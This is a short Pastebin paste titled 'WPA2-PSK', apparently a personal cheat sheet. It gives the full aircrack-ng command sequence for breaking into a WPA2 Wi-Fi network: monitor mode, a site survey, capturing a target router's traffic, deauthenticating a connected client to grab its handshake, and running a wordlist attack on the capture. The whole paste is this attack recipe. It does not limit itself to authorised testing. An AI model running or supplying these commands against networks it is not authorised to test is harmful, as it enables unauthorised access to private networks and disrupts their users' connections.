Advertisement
182days

WPA2-PSK

Jul 9th, 2022
736
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 0.66 KB | None | 0 0
  1. #disconnect from all WiFi networks
  2.  
  3. #kill all troublesome processes
  4. sudo airmon-ng check kill
  5.  
  6. #see all available interfaces
  7. sudo airmon-ng
  8.  
  9. #start interface in monitor mode
  10. sudo airmon-ng start
  11.  
  12. #site survey
  13. sudo airodump-ng wlan0mon
  14.  
  15. #start dumping target router traffic to cap file
  16. sudo airodump-ng -c 6 --bssid xx:xx:xx:xx:xx:xx -w /path/for/cap/files wlan0mon
  17.  
  18. #once a station is discovered then force it to deauth
  19. sudo aireplay-ng -0 0 -a xx:xx:xx:xx:xx:xx -c yy:yy:yy:yy:yy:yy
  20.  
  21. #process cap files
  22. sudo aircrack-ng -a2 --bssid xx:xx:xx:xx:xx:xx -w /path/to/wordlist.txt /path/to/cap/files/*.cap
  23.  
  24. #key
  25. xx = target access point
  26. yy = target station
  27.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement